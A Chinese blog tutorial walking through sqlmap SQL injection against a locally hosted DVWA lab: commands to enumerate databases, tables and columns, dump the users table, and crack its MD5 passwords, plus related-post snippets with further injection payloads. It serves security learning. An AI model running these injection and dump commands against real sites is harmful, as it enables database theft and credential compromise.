slqmap的爆库爆表爆字段(以本地搭建的DVWA为例)

最新推荐文章于 2024-05-03 23:12:13 发布
最新推荐文章于 2024-05-03 23:12:13 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: 渗透相关 文章标签: SqlMap工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41523170/article/details/107228335
版权

环境

window10、sqlmap、本地搭建的DVWA

步骤

1、先将DVWA安全等级设置为low

2、选择SQL Injection输入1查询

在这里插入图片描述

3、将url复制下来,并查看cookie信息

url:http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

cookie="Cookie: security=low; PHPSESSID=7si7t5md1ntl03q0oc1ktcm0q2"

4、打开sqlmap使用命令爆库

命令

-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" --dbs

然后在注入过程中会有一些交互,根据情况选择y/n,然后得到数据库:
在这里插入图片描述

5、爆表

命令:

-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa --table

得到dvwa中的数据表如下:
在这里插入图片描述

6、爆users表结构并查询users表内有多少条数据

命令:

-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users --column

在这里插入图片描述
命令:

-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users --count

在这里插入图片描述

7、爆users表内容

命令:

-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users --dump

在这里插入图片描述

8、爆指定字段(user,password)

命令:

-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users -C user,password --dump

在这里插入图片描述
可以看到password是以密文存储的,在爆破过程中会询问是否要用字典进行解密,我选择的是n,下面我是手动解密的(数据少的时候可以考虑),最后得到如下结果:在线解密

userPasswordPassword(解密后)
admin5f4dcc3b5aa765d61d8327deb882cf99password
gordonbe99a18c428cb38d5f260853678922e03abc123
13378d3533d75ae2c3966d7e0d4fcc69216bcharley
pablo0d107d09f5bbe40cade3de5c71e9e9b7letmein
smithy5f4dcc3b5aa765d61d8327deb882cf99password
Qian途
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql注入爆破数据库,SQL注入之sqlmap爆破sqli-labs-master
weixin_34748612的博客
03-18 790
sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。GET型的sqlmap爆破。1.枚举数据库:Python sqlmay.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –dbs; 2.列出数据库中数据表:python sqlmap.py -u http://localhos...
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
Sqlmap入门爆库、爆表、爆字段、爆记录
weixin_56306210的博客
10-31 2435
Sqlmap爆库、爆表、爆字段、爆记录
sqlmap入门-爆库,爆表,列,字段
weixin_46626737的博客
11-14 7114
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs爆数据库 假设结果中有member数据库 ②爆表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③爆列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④爆字段 python sq
INFORMATION_SCHEMA.COLUMNS-表的字段信息
weixin_30500105的博客
09-23 325
MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。 若要从这些视图中检索信息,请指定完全合格的 INFORMATION_SCHEMA view_name 名称。 列名数据类型描述 TABLE_CATALOG nvarchar(128...
Sqlmap爆库命令的简单使用
1stPeak's Blog
04-24 6557
测试地址:因为涉及商业隐私,这里就不列啦 我这里用的是windows,并没有用kali,所以需要使用sqlmap.py 1.Sqlmap.py -u "网址" 网址存在注入点 可以看出有三个注入点,底下还有其他系统或数据库信息 2.曝出数据库名称 --dbs 可以看出有三个数据库 3.查看web当前使用的数据库 --current -db 4.曝出web数据库使用账户 -...
mysql爆表,「爆表」MYSQL数据库爆库爆表爆字段 - seo实验室
weixin_32226157的博客
03-18 512
爆表mysql版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。列名数据类型描述TABLE_CATALOGnvarchar(128)表限定符。TABLE_SCHEMAnvarchar(128)表所有者。TABLE_NAMEnvarchar(128)表名。COLUMN_NAM...
靶场:sql-less-18——sqlmap爆库的操作
2301_79757379的博客
03-10 589
靶场:sql-less-18——sqlmap爆库的操作
关于sql注入暴库爆表爆字段
weixin_48421613的博客
07-21 3758
首先先介绍一下数据库默认库information_schema中的一些重要表 information中有三个重要的表,我们可以通过这些表得道自己想要的库名字、表名字、字段名字 1)information_schema.schemata schemata 表中重要字段为 schema_name ,此字段中涵盖数据库存在的所有的库名字,我们可以通过一些查询语句得知我们想要的数据库都有哪些(database()只可以得知当前数据库我们就不进行讨论了) 例: ?id=-1 union select 1,
2024年网络安全最新网络安全-sqlmap实战之sqlilabs-Less1_less1爆表
2401_84302796的博客
05-03 900
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
爆表
liushan63_csdn的博客
08-26 104
2020-08-25 周二。晚上8点之前。
slqmap for windows
07-19
注意:使用之前自己安装Python运行环境。 亲测win7可用。 ================== sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。 有许多其它SQL 射入工具在网, 但我不能发现任何人适合所有我的需要因此我感到需要在我的渗透测试期间给成功地写我自己的工具测试, 辨认和利用网应用的SQL 射入在安全上的弱点。
sqlmap工具的实操--sql注入
weixin_66839513的博客
04-01 2821
sql注入原理就是将恶意的sql语句通过表单或者url拼接到web后端的查询语句中,绕过后端的认证,在后端被服务器执行恶意的sql语句,获取到数据库的权限,从而对数据库进行执行操作,造成数据的篡改及泄露。
如何使用sqlmap爆库和挂马
Leslieyzz的博客
01-19 2465
如何使用sqlmap爆库和挂马的技术博客
sqlmap使用
Likhaooo的博客
04-05 240
文章目录sqlmap介绍get注入检测级别属性头注入sqlmap*优先指定检测注入执行命令自定义请求包注入注入的选择其他 sqlmap介绍 sqlmap是一款自动化得sql注入工具,主要功能扫描判断是否存在sql注入漏洞,发现并利用给定得url得sql注入漏洞 get注入 sqlmap.py -u “url” 检测 sqlmap.py -u “url” --dbs 爆出数据库名 sqlmap.py -u “url” --tables -D “数据库名” 爆表 sqlmap.py -u “url” --col
注入sql攻击,爆库,爆表,爆字段
zzzgd_666的博客
07-07 1279
注入sql攻击,爆库,爆表,爆字段函数注意点防范于未然, 了解它,然后避免它.用好#预编译 研究sql注入攻击的方式, 自己有空写个demo试下效果 函数 除了这个函数还有其他几个函数可以实现注入sql攻击的效果 updatexml(a,b,c) 参数a: xml文档名字 参数b: xpath表达式 参数c: 替换的值 原理就是将b替换成concat函数, concat函数里又包含sql, mysq基于函数的运算法则, 应该是先执行里面的sql, 然后将查询到的值, 执行concat函数, 得到最终的字符串
PHP盲注常用爆库暴表等等语句
收集盒 Book box
07-08 1653
判断版本号(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by
sqlmap1.1.3官方版
weixin_30677073的博客
01-29 396
下载地址:网盘下载Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点:完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。完...
如何不用本地地址搭建dvwa
09-30
搭建DVWA(Damn Vulnerable Web Application)而不使用本地地址,可以按以下步骤进行: 1. 选择一个云平台:选择一家提供云计算服务的云平台,例如AWS(Amazon Web Services)、Azure等。注册并创建一个新的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值